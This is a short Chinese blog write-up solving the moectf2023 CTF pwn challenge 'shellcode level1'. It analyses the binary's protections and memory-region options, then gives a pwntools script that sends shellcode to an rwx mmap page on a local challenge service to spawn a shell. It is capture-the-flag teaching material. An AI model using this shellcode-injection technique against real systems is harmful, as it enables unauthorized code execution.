moectf2023 - shellcode level1

RocketDev
  2023-09-23 12:00 2023-09-23 12:00 创建   2024-07-25 12:34:56 2024-07-25 12:34:56 更新      

文件分析

下载shellcode_level1, NX on, PIE on, Canary on, RELRO full
ghidra分析为64位程序

解题思路

这次要我们选择内存单元执行,有stack, .bss, heap, mmap页等
其中mmap分配时0页为rw-,后改为rwx;
分配1页时为rwx,后改为---

只要输入4即可执行shellcode,同上题

EXPLOIT

1
2
3
4
5
6
from pwn import *
sh = remote('localhost', 33251)
sh.sendline(b'4') # mmap paper 0
shc = asm(shellcraft.amd64.sh(), arch='amd64')
sh.sendline(shc)
sh.interactive()

Done.

  • 标题: moectf2023 - shellcode level1
  • 作者: RocketDev
  • 创建于 : 2023-09-23 12:00:00
  • 更新于 : 2024-07-25 12:34:56
  • 链接: https://rocketmadev.github.io/2023/09/23/shellcode_level1/
  • 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。
评论
目录
moectf2023 - shellcode level1
  1. 文件分析
  2. 解题思路
  3. EXPLOIT